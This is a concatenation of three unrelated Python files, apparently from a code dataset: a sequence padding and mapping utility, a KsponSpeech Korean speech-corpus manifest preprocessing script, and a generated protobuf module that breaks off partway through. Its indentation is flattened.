character-level-encoded sequences (words are the 1st hierarchy level,
characters the 2nd one)
[
'a brown cat sat on the red mat',
'a gray fox jumped over the dog',
'Phil saw Feel feel the feels'
]
will become
[
[[0], [1, 17, 14, 22, 13], [2, 0, 19], [18, 0, 19], [14, 13], [19, 7, 4], [17, 4, 3], [12, 0, 19]],
[[0], [6, 17, 0, 24], [5, 14, 23], [9, 20, 12, 15, 4, 3], [14, 21, 4, 17], [19, 7, 4], [3, 14, 6]],
[[99, 7, 8, 11], [18, 0, 22], [99, 4, 4, 11], [5, 4, 4, 11], [19, 7, 4], [5, 4, 4, 11, 18]]
]
return the padded and mapped sequences, along with the original lengths
and a mask indicating the real item positions, as opposed to the
paddings"""
splitted_seqs_d2 = split_sequences2d(sequences, seq_splitter_d1,
seq_splitter_d2)
splitted_mapped_seqs_d2 = []
for splitted_seq_d2 in splitted_seqs_d2:
splitted_mapped_sequences = map_sequences(splitted_seq_d2,
sequence_map_d2,
unk_item_id_d2)
splitted_mapped_seqs_d2.append(splitted_mapped_sequences)
return splitted_mapped_seqs_d2
def split_map_pad_sequences2d(sequences, sequence_map_d2, unk_item_id_d2,
pad_id_d2, seq_splitter_d1, seq_splitter_d2):
splitted_mapped_seqs_d2 = split_map_sequences2d(
sequences, sequence_map_d2, unk_item_id_d2,
seq_splitter_d1, seq_splitter_d2)
padded_batch, first_h_lengths, second_h_lengths, masks = \
pad2d(splitted_mapped_seqs_d2, pad_id_d2)
return padded_batch, first_h_lengths, second_h_lengths, masks
if __name__ == '__main__':
seq = 'a cat sat on the red mat'
splitted_seq = ['a', 'cat', 'sat', 'on', 'the', 'mat']
sequence_map = {'cat': 1, 'mat': 2, 'a': 3, 'sat': 4, 'the': 5, 'on': 6,
'feel': 7, 'feels': 8, 'saw': 9}
print(split_map_sequence(seq, sequence_map, 0, lambda x: x.split(' ')))
print(map_sequence(splitted_seq, sequence_map, 0))
print('Sequence map:\n', sequence_map)
str_sequences = ['a brown cat sat on the red mat',
'a gray fox jumped over the dog',
'Phil saw Feel feel the feels']
print('Sequences:\n', str_sequences)
id_sequences = split_map_sequences(str_sequences, sequence_map, 0,
lambda x: x.split(' '))
print('Splitted and transformed sequences:\n',
id_sequences)
print('\n' + 72 * '#' + '\n')
sequences = [[2, 45, 3, 23, 54], [12, 4, 2, 2], [4], [45, 12]]
padded_sequences, lengths, mask = pad1d(sequences, 0)
print('Original sequences:\n\t', sequences)
print('Padded sequences:\n', padded_sequences)
print('Lengths:\n', lengths)
print('Mask:\n', mask)
left_padded_sequences, lengths, left_padded_mask = \
pad1d(sequences, 0, align_right=True)
print('Left padded sequences:\n', left_padded_sequences)
print('Left padded mask:\n', left_padded_mask)
print('\n' + 72 * '#' + '\n')
char_encoded_sent = [[[1, 2, 3], [4, 5, 6, 1], [10, 23], [3, 5, 2, 1, 76]],
[[7, 8, 9, 10, 11], [1, 2, 5, 3, 6, 10, 12]]]
padded_batch, sentence_lengths, word_lengths, masks = \
pad2d(char_encoded_sent, 0)
print('Char-encoded sent:\n\t', char_encoded_sent)
print('padded char-encoded sent:\n', padded_batch)
print('sentence lengths:\n', sentence_lengths)
print('word lengths tensor:\n', word_lengths)
print('masks:\n', masks)
print('\n' + 72 * '#' + '\n')
print('Transform a batch of sentences into a padded batch of ids\n')
print('Sequences:\n', str_sequences)
padded_sequences, lengths, mask = split_map_pad_sequences(
str_sequences, sequence_map, 0, 0, lambda x: x.split(' '))
print('Padded sequences:\n', padded_sequences)
print('Lengths:\n', lengths)
print('Mask:\n', mask)
alphabet = 'abcdefghijklmnopqrstuvwxyz'
sequence_map_d2 = {char: idx for idx, char in enumerate(alphabet)}
splitted_seqs_d2 = split_sequences2d(str_sequences,
lambda x: x.split(' '),
lambda x: [y for y in x])
print(splitted_seqs_d2)
splitted_mapped_seqs_d2 = \
split_map_sequences2d(str_sequences, sequence_map_d2, 99,
lambda x: x.split(' '),
lambda x: [y for y in x])
print(splitted_mapped_seqs_d2)
splitted_mapped_padded_seqs_d2 = \
split_map_pad_sequences2d(
str_sequences, sequence_map_d2, 99,
33,
lambda x: x.split(' '),
lambda x: [y for y in x])
print(splitted_mapped_padded_seqs_d2)
| nilq/baby-python | python |
import argparse
from preprocess import preprocess
import os
from pathlib import Path
import wave
import numpy as np
import unicodedata
import random
from tqdm import tqdm
import re
import yaml
import sys
import librosa
## Fairseq 스타일로 변환하기
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument(
"--root", default='/code/gitRepo/data/aihub/ksponspeech', metavar="DIR",
help="root directory containing flac files to index"
)
parser.add_argument(
"--info", default=None, metavar="DIR",
help="전처리 추가적으로 수행한 것."
)
parser.add_argument(
"--do_info", action="store_true",
help="전처리 추가적으로 수행할지 여부 확인"
)
parser.add_argument(
"--do_remove", action="store_true",
help="한글 음소가 아닌 숫자, 영어가 포함되어 있는 모든 단어를 삭제할지 여부 확인"
)
parser.add_argument(
"--token_limit", default=sys.maxsize, type=int,
help="최대 글자수 체크"
)
parser.add_argument(
"--dest", default='manifest_temp', type=str, metavar="DIR", help="output directory"
)
parser.add_argument(
"--ext", default="pcm", type=str, metavar="EXT", help="extension to look for"
)
parser.add_argument('--preprocess_mode', type=str,
default='phonetic',
help='Ex) (70%)/(칠 십 퍼센트) 확률이라니 (뭐 뭔)/(모 몬) 소리야 진짜 (100%)/(백 프로)가 왜 안돼?'
'phonetic: 칠 십 퍼센트 확률이라니 모 몬 소리야 진짜 백 프로가 왜 안돼?'
'spelling: 70% 확률이라니 뭐 뭔 소리야 진짜 100%가 왜 안돼?')
parser.add_argument('--output_unit', type=str,
default='grapheme',
help='character or subword or grapheme')
parser.add_argument('--additional_output_unit', type=str,
default=None,
help='character or subword or grapheme')
parser.add_argument("--seed", default=42, type=int, metavar="N", help="random seed")
parser.add_argument(
"--time",
default=None,
type=str,
metavar="MIN",
help="set if you want make split manifest",
)
parser.add_argument('--script_path', type=str,
default="/code/gitRepo/data/aihub/ksponspeech/KsponSpeech_scripts",
help='AIHUB에서 제공해 주는 스크립트 폴더')
parser.add_argument(
"--del_silence", action="store_true",
help="음성이 없는 곳을 삭제하는 건 어때?"
)
return parser
def find_index(durations, limit):
for idx in range(len(durations)):
if sum(durations[:idx]) > limit:
return idx
return len(durations)
def set_seed(seed):
random.seed(seed)
np.random.seed(seed)
def load_yaml(yaml_path):
# Read YAML file
with open(yaml_path, 'r') as stream:
data_loaded = yaml.load(stream, Loader=yaml.FullLoader)
return data_loaded
def load_info(info_path):
if not os.path.isdir(info_path):
return {}
info_files = [filename for filename in os.listdir(info_path) if '.yaml' in filename]
info_data = {}
for filename in info_files:
file_path = os.path.join(info_path, filename)
temp_data = load_yaml(file_path)
info_data.update(temp_data)
return info_data
def save_converted_info(args, name, converted_info):
if len(converted_info) == 0:
return
yaml_dict = {k: v for k, v in sorted(converted_info.items(), key=lambda item: (len(item[0]), item[0]))}
with open(os.path.join(args.dest, '{}.yaml'.format(name)), 'w', encoding="utf-8") as write_f:
yaml.dump(yaml_dict, write_f, allow_unicode=True, default_style=None, default_flow_style=False)
def save_wrong_script(args, name, transcripts, fileinfo, raw_sentences, new_sentences):
## 틀린 것 저장하기
## 알파벳 추가
reg = re.compile(r'[A-Z]')
yaml_dict = {}
for grapheme_transcript, fileitem, raw_sentence, new_sentence in zip(transcripts, fileinfo, raw_sentences,
new_sentences):
graphemes = grapheme_transcript.split()
file_num = Path(fileitem.split()[0]).stem.split("_")[1]
assert len(file_num) == 6
for grapheme in graphemes:
if grapheme.isdigit() or reg.match(grapheme):
yaml_dict[file_num] = str(raw_sentence.replace('\n', ''))
if len(yaml_dict) == 0:
return
## Sorting
yaml_dict = {k: v for k, v in sorted(yaml_dict.items(), key=lambda item: (len(item[0]), item[0]))}
with open(os.path.join(args.dest, '{}.yaml'.format(name)), 'w', encoding="utf-8") as write_f:
yaml.dump(yaml_dict, write_f, allow_unicode=True, default_style=None, default_flow_style=False)
def save_dict(args, transcripts, dict_name='dict.ltr.txt', alphabet_name='alphabet.txt'):
vocab_list = list()
vocab_freq = list()
for grapheme_transcript in transcripts:
graphemes = grapheme_transcript.split()
for grapheme in graphemes:
if grapheme not in vocab_list:
vocab_list.append(grapheme)
vocab_freq.append(1)
else:
vocab_freq[vocab_list.index(grapheme)] += 1
## write ltr
vocab_freq, vocab_list = zip(*sorted(zip(vocab_freq, vocab_list), reverse=True))
with open(os.path.join(args.dest, dict_name), 'w') as write_f:
for idx, (grpm, freq) in enumerate(zip(vocab_list, vocab_freq)):
print("{} {}".format(grpm, freq), file=write_f)
## Write Vocab files
with open(os.path.join(args.dest, alphabet_name), 'w', encoding='UTF8') as write_f:
print("# Each line in this file represents the Unicode codepoint (UTF-8 encoded)", file=write_f)
print("# associated with a numeric label.", file=write_f)
print("# A line that starts with # is a comment. You can escape it with \# if you wish", file=write_f)
print("# to use '#' as a label.", file=write_f)
for token in vocab_list:
print(token, file=write_f)
## final token must be \n
print('', file=write_f)
print("# The last (non-comment) line needs to end with a newline.", file=write_f, end='')
return
def save_lexicon(args, texts, lexicon_name='lexicon.lst'):
vocab_list = {}
for text in texts:
for word in text.split():
new_word = word + "|"
vocab_list[word] = " ".join(new_word)
## Write Vocab files
## Sorting
vocab_list = {k: v for k, v in sorted(vocab_list.items(), key=lambda item: item[0])}
with open(os.path.join(args.dest, lexicon_name), 'w', encoding='UTF8') as write_f:
for k, v in vocab_list.items():
print("{}\t{}".format(k,v), file=write_f)
return
def save_files(args, file_name, dir_path, fileinfo, texts, transcripts):
with open(os.path.join(args.dest, file_name + ".tsv"), 'w') as tsv_out, open(
os.path.join(args.dest, file_name + ".ltr"), "w"
) as ltr_out, open(
os.path.join(args.dest, file_name + ".wrd"), "w"
) as wrd_out:
print(dir_path, file=tsv_out)
for tsv_item, wrd_item, ltr_item in zip(fileinfo, texts, transcripts):
print(tsv_item, file=tsv_out)
print(wrd_item, file=wrd_out)
print(ltr_item + " |", file=ltr_out)
print("save files [{}]".format(file_name))
return
def pcm2wav(pcm_file, channels=1, bit_depth=16, sampling_rate=16000):
wav_file = str(Path(pcm_file).with_suffix('.wav'))
# Check if the options are valid.
if bit_depth % 8 != 0:
raise ValueError("bit_depth " + str(bit_depth) + " must be a multiple of 8.")
# Read the .pcm file as a binary file and store the data to pcm_data
with open(pcm_file, 'rb') as opened_pcm_file:
pcm_data = opened_pcm_file.read()
with wave.open(wav_file, 'wb') as obj2write:
obj2write.setnchannels(channels)
obj2write.setsampwidth(bit_depth // 8)
obj2write.setframerate(sampling_rate)
obj2write.writeframes(pcm_data)
return wav_file
def load_script(args, script_path, info_data, token_limit=sys.maxsize):
assert os.path.isfile(script_path)
fileinfo = list()
durations = list()
texts = list()
audio_nums = list()
transcripts = list()
additional_texts = list()
additional_transcripts = list()
raw_sentences = list()
new_sentences = list()
converted_info = {}
reg = re.compile(r'.*[a-zA-Z0-9]')
limit_count = 0
remove_count = 0
with open(script_path, "r") as f:
for line in tqdm(f):
convert_flag = False
items = line.split(" :: ")
file_path = os.path.join(args.root, items[0])
file_path = os.path.realpath(file_path)
audio_num = str(Path(file_path).stem.split("_")[1])
raw_sentence = items[1]
if len(audio_num) ==6 and audio_num in info_data:
raw_sentence = info_data[audio_num]
convert_flag=True
## 확장자 확인
if args.ext == 'pcm':
try:
wav = np.memmap(file_path, dtype='h', mode='r').astype('float32') / 32767
sr = 16000
except ValueError:
# print('pcm load 에러 wave로 교체 [{}]'.format(file_path))
file_path = pcm2wav(file_path)
wav, sr = librosa.load(file_path, sr=16000)
elif args.ext in ['flac', 'wav']:
wav, sr = librosa.load(file_path, sr=16000)
else:
raise ValueError("Unsupported extention method : {0}".format(args.ext))
if args.del_silence:
non_silence_indices = librosa.effects.split(wav, top_db=30)
wav = np.concatenate([wav[start:end] for start, end in non_silence_indices])
frames = len(wav)
if len(audio_num) ==6:
new_sentence = preprocess(raw_sentence=raw_sentence, mode=args.preprocess_mode, audio_num=audio_num)
else:
new_sentence = raw_sentence.replace('\n', '')
##################################
if len(new_sentence) > token_limit:
limit_count+=1
continue
if args.do_remove and reg.match(new_sentence) and args.preprocess_mode != 'spelling':
converted_info[audio_num] = new_sentence
remove_count += 1
continue
#################################
## 저장 모드는 여기에 추가하기.
if args.output_unit == 'grapheme':
texts.append(unicodedata.normalize('NFKD', new_sentence).upper())
transcripts.append(" ".join(unicodedata.normalize('NFKD', new_sentence).replace(' ', '|')).upper())
elif args.output_unit == 'character':
texts.append(new_sentence.upper())
transcripts.append(" ".join(list(new_sentence.replace(' ', '|').upper())))
else:
raise ValueError("Unsupported preprocess method : {0}".format(args.output_unit))
## 저장 모드는 여기에 추가하기.
if args.additional_output_unit is not None:
if args.additional_output_unit == 'grapheme':
additional_texts.append(unicodedata.normalize('NFKD', new_sentence).upper())
additional_transcripts.append(" ".join(unicodedata.normalize('NFKD', new_sentence).replace(' ', '|')).upper())
elif args.additional_output_unit == 'character':
additional_texts.append(new_sentence.upper())
additional_transcripts.append(" ".join(list(new_sentence.replace(' ', '|').upper())))
else:
raise ValueError("Unsupported preprocess method : {0}".format(args.output_unit))
if convert_flag:
converted_info[audio_num] = new_sentence
## 넣기
fileinfo.append("{}\t{}".format(os.path.relpath(file_path, args.root), frames))
durations.append(frames)
audio_nums.append(audio_num)
raw_sentences.append(raw_sentence)
new_sentences.append(new_sentence)
print("총 무시된 숫자 : ", limit_count+remove_count)
print("길이를 넘겨서 무시된 숫자 : ", limit_count)
print("숫자등이 있어서 무시된 숫자 : ", remove_count)
return fileinfo, durations, texts, audio_nums, transcripts, raw_sentences, new_sentences, converted_info, additional_texts, additional_transcripts
def main(args):
if not os.path.exists(args.dest):
os.makedirs(args.dest)
args.root = os.path.realpath(args.root)
## --dataset_path 에 있어야 하는 폴더들
#for folder in ['KsponSpeech_01','KsponSpeech_02','KsponSpeech_03','KsponSpeech_04','KsponSpeech_05','KsponSpeech_eval']:
# if folder not in os.listdir(args.root):
# assert os.path.isdir(folder), "root 위치에 해당 폴더가 반드시 필요합니다. [{}]".format(folder)
assert os.path.isdir(args.script_path), "aihub에서 제공해주는 스크립트 폴더를 넣어주시기 바랍니다. script_path : [{}]".format(args.script_path)
## Info 파일 불러오기
info_data = {}
if args.do_info:
## info 파일 불러오기
info_data = load_info(args.info)
## .trn 확장자만 확인함
file_list = [file for file in os.listdir(args.script_path) if Path(file).suffix == '.trn']
assert len(file_list) > 0, "스크립트 파일이 한개도 없네요 [{}]".format(args.script_path)
## 스크립트 읽어오기.
script_name = 'train.trn'
if script_name in file_list:
print("generate [{}]".format(script_name))
fileinfo, durations, texts, audio_nums, transcripts, raw_sentences, new_sentences, converted_info, additional_texts, additional_transcripts = load_script(args, os.path.join(args.script_path, script_name), info_data, token_limit=args.token_limit)
fileinfo = np.array(fileinfo)
durations = np.array(durations)
texts = np.array(texts)
transcripts = np.array(transcripts)
## 추가용
additional_texts = np.array(additional_texts)
additional_transcripts = np.array(additional_transcripts)
## lexicon 만들기
save_lexicon(args, texts, lexicon_name='lexicon.lst')
## dictionary 저장
save_dict(args, transcripts, dict_name='dict.ltr.txt', alphabet_name='alphabet.txt')
## 추가용 만들기
if args.additional_output_unit is not None:
## lexicon 만들기
save_lexicon(args, additional_texts, lexicon_name='add_lexicon.lst')
## dictionary 저장
save_dict(args, additional_transcripts, dict_name='add_dict.ltr.txt', alphabet_name='add_alphabet.txt')
#save_wrong_script(args, 'train_wrong',transcripts, fileinfo, raw_sentences, new_sentences)
save_converted_info(args, 'train_converted', converted_info)
## train 이랑 dev 나눠서 저장
train_ids = [idx for idx, num in enumerate(audio_nums)]
limit_idx = len(train_ids)
if args.time is not None:
random.shuffle(train_ids)
assert args.time in ['10min', '1hour', '10hour', '100hour'], '설정 재대로 해라...'
time_limit = 0
if args.time == '10min':
## 16000 hz * 60초 * 10분
time_limit = 16000 * 60 * 10
if args.time == '1hour':
## 16000 hz * 60초 * 60분 * 1
time_limit = 16000 * 60 * 60 * 1
if args.time == '10hour':
## 16000 hz * 60초 * 60분 * 10
time_limit = 16000 * 60 * 60 * 10
if args.time == '100hour':
## 16000 hz * 60초 * 60분 * 100
time_limit = 16000 * 60 * 60 * 100
limit_idx = find_index(durations[train_ids], time_limit)
save_files(args, 'train', args.root, fileinfo[train_ids[:limit_idx]], texts[train_ids[:limit_idx]],
transcripts[train_ids[:limit_idx]])
## 추가용 만들기
if args.additional_output_unit is not None:
save_files(args, 'add_train', args.root, fileinfo[train_ids[:limit_idx]], additional_texts[train_ids[:limit_idx]],
additional_transcripts[train_ids[:limit_idx]])
## 스크립트 읽어오기.
script_name = 'dev.trn'
if script_name in file_list:
print("generate [{}]".format(script_name))
fileinfo, durations, texts, audio_nums, transcripts, raw_sentences, new_sentences, converted_info, additional_texts, additional_transcripts = load_script(args, os.path.join(args.script_path, script_name), info_data)
save_files(args, 'dev', args.root, fileinfo, texts, transcripts)
## 추가용 만들기
if args.additional_output_unit is not None:
save_files(args, 'add_dev', args.root, fileinfo, additional_texts, additional_transcripts)
#save_wrong_script(args, 'dev_wrong', transcripts, fileinfo, raw_sentences, new_sentences)
save_converted_info(args, 'dev_converted', converted_info)
## 스크립트 읽어오기.
script_name = 'eval_other.trn'
if script_name in file_list:
print("generate [{}]".format(script_name))
fileinfo, durations, texts, audio_nums, transcripts, raw_sentences, new_sentences, converted_info, additional_texts, additional_transcripts = load_script(args, os.path.join(args.script_path,
script_name), info_data)
save_files(args, 'eval_other', args.root, fileinfo, texts, transcripts)
## 추가용 만들기
if args.additional_output_unit is not None:
save_files(args, 'add_eval_other', args.root, fileinfo, additional_texts, additional_transcripts)
#save_wrong_script(args, 'eval_other_wrong', transcripts, fileinfo, raw_sentences, new_sentences)
save_converted_info(args, 'eval_other_converted', converted_info)
## 스크립트 읽어오기.
script_name = 'eval_clean.trn'
if script_name in file_list:
print("generate [{}]".format(script_name))
fileinfo, durations, texts, audio_nums, transcripts, raw_sentences, new_sentences, converted_info, additional_texts, additional_transcripts = load_script(args, os.path.join(args.script_path,
script_name), info_data)
save_files(args, 'eval_clean', args.root, fileinfo, texts, transcripts)
## 추가용 만들기
if args.additional_output_unit is not None:
save_files(args, 'add_eval_clean', args.root, fileinfo, additional_texts, additional_transcripts)
#save_wrong_script(args, 'eval_clean_wrong', transcripts, fileinfo, raw_sentences, new_sentences)
save_converted_info(args, 'eval_clean_converted', converted_info)
if __name__ == '__main__':
parser = get_parser()
args = parser.parse_args()
def _print_config(config):
import pprint
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(vars(config))
_print_config(args)
main(args)
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: github.com/metaprov/modelaapi/services/modelpipelinerun/v1/modelpipelinerun.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1 import generated_pb2 as github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='github.com/metaprov/modelaapi/services/modelpipelinerun/v1/modelpipelinerun.proto',
package='github.com.metaprov.modelaapi.services.modelpipelinerun.v1',
syntax='proto3',
serialized_options=b'Z:github.com/metaprov/modelaapi/services/modelpipelinerun/v1',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\nQgithub.com/metaprov/modelaapi/services/modelpipelinerun/v1/modelpipelinerun.proto\x12:github.com.metaprov.modelaapi.services.modelpipelinerun.v1\x1a\x1cgoogle/api/annotations.proto\x1aHgithub.com/metaprov/modelaapi/pkg/apis/training/v1alpha1/generated.proto\"\xd6\x01\n\x1cListModelPipelineRunsRequest\x12\x11\n\tnamespace\x18\x01 \x01(\t\x12t\n\x06labels\x18\x03 \x03(\x0b\x32\x64.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest.LabelsEntry\x1a-\n\x0bLabelsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"~\n\x1dListModelPipelineRunsResponse\x12]\n\x05items\x18\x01 \x01(\x0b\x32N.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.ModelPipelineRunList\"\x1a\n\x18ModelPipelineRunResponse\"y\n\x1d\x43reateModelPipelineRunRequest\x12X\n\x04item\x18\x01 \x01(\x0b\x32J.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.ModelPipelineRun\" \n\x1e\x43reateModelPipelineRunResponse\"y\n\x1dUpdateModelPipelineRunRequest\x12X\n\x04item\x18\x01 \x01(\x0b\x32J.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.ModelPipelineRun\" \n\x1eUpdateModelPipelineRunResponse\"=\n\x1aGetModelPipelineRunRequest\x12\x11\n\tnamespace\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\"\x85\x01\n\x1bGetModelPipelineRunResponse\x12X\n\x04item\x18\x01 \x01(\x0b\x32J.github.com.metaprov.modelaapi.pkg.apis.training.v1alpha1.ModelPipelineRun\x12\x0c\n\x04yaml\x18\x02 \x01(\t\"@\n\x1d\x44\x65leteModelPipelineRunRequest\x12\x11\n\tnamespace\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\" \n\x1e\x44\x65leteModelPipelineRunResponse\"a\n\x1e\x41pproveModelPipelineRunRequest\x12\x11\n\tnamespace\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\r\n\x05stage\x18\x03 \x01(\t\x12\x0f\n\x07\x61\x63\x63ount\x18\x04 \x01(\t\"!\n\x1f\x41pproveModelPipelineRunResponse\"^\n\x1b\x44\x65nyModelPipelineRunRequest\x12\x11\n\tnamespace\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\r\n\x05stage\x18\x03 \x01(\t\x12\x0f\n\x07\x61\x63\x63ount\x18\x04 \x01(\t\"\x1e\n\x1c\x44\x65nyModelPipelineRunResponse\"\x1f\n\x1dPauseModelPipelineRunResponse\"?\n\x1cPauseModelPipelineRunRequest\x12\x11\n\tnamespace\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\" \n\x1eResumeModelPipelineRunResponse\"@\n\x1dResumeModelPipelineRunRequest\x12\x11\n\tnamespace\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\"\x1f\n\x1d\x41\x62ortModelPipelineRunResponse\"?\n\x1c\x41\x62ortModelPipelineRunRequest\x12\x11\n\tnamespace\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t2\xeb\x14\n\x17ModelPipelineRunService\x12\xf5\x01\n\x15ListModelPipelineRuns\x12X.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest\x1aY.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsResponse\"\'\x82\xd3\xe4\x93\x02!\x12\x1f/api/v1alpha1/modelpipelineruns\x12\xfb\x01\n\x16\x43reateModelPipelineRun\x12Y.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.CreateModelPipelineRunRequest\x1aZ.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.CreateModelPipelineRunResponse\"*\x82\xd3\xe4\x93\x02$\"\x1f/api/v1alpha1/modelpipelineruns:\x01*\x12\xf6\x01\n\x13GetModelPipelineRun\x12V.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunRequest\x1aW.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunResponse\".\x82\xd3\xe4\x93\x02(\x12&/api/v1alpha1/modelpipelineruns/{name}\x12\x9c\x02\n\x16UpdateModelPipelineRun\x12Y.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.UpdateModelPipelineRunRequest\x1aZ.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.UpdateModelPipelineRunResponse\"K\x82\xd3\xe4\x93\x02\x45\x1a@/api/v1alpha1/modelpipelineruns/{modelpipelinerun.metadata.name}:\x01*\x12\x93\x02\n\x16\x44\x65leteModelPipelineRun\x12Y.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DeleteModelPipelineRunRequest\x1aZ.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DeleteModelPipelineRunResponse\"B\x82\xd3\xe4\x93\x02<*:/api/v1/modelpipelineruns/{modelpipelinerun.metadata.name}\x12\x9e\x02\n\x17\x41pproveModelPipelineRun\x12Z.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunRequest\x1a[.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunResponse\"J\x82\xd3\xe4\x93\x02\x44*B/api/v1/modelpipelineruns/{modelpipelinerun.metadata.name}:approve\x12\x95\x02\n\x14\x44\x65nyModelPipelineRun\x12W.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunRequest\x1aX.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunResponse\"J\x82\xd3\xe4\x93\x02\x44*B/api/v1/modelpipelineruns/{modelpipelinerun.metadata.name}:approve\x12\xf8\x01\n\x15\x41\x62ortModelPipelineRun\x12X.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.AbortModelPipelineRunRequest\x1aY.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.AbortModelPipelineRunResponse\"*\x82\xd3\xe4\x93\x02$\"\"/v1/modelpipelineruns/{name}:abort\x12\xf8\x01\n\x15PauseModelPipelineRun\x12X.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.PauseModelPipelineRunRequest\x1aY.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.PauseModelPipelineRunResponse\"*\x82\xd3\xe4\x93\x02$\"\"/v1/modelpipelineruns/{name}:pause\x12\xfc\x01\n\x16ResumeModelPipelineRun\x12Y.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ResumeModelPipelineRunRequest\x1aZ.github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ResumeModelPipelineRunResponse\"+\x82\xd3\xe4\x93\x02%\"#/v1/modelpipelineruns/{name}:resumeB<Z:github.com/metaprov/modelaapi/services/modelpipelinerun/v1b\x06proto3'
,
dependencies=[google_dot_api_dot_annotations__pb2.DESCRIPTOR,github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2.DESCRIPTOR,])
_LISTMODELPIPELINERUNSREQUEST_LABELSENTRY = _descriptor.Descriptor(
name='LabelsEntry',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest.LabelsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest.LabelsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest.LabelsEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=419,
serialized_end=464,
)
_LISTMODELPIPELINERUNSREQUEST = _descriptor.Descriptor(
name='ListModelPipelineRunsRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest.namespace', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='labels', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest.labels', index=1,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_LISTMODELPIPELINERUNSREQUEST_LABELSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=250,
serialized_end=464,
)
_LISTMODELPIPELINERUNSRESPONSE = _descriptor.Descriptor(
name='ListModelPipelineRunsResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
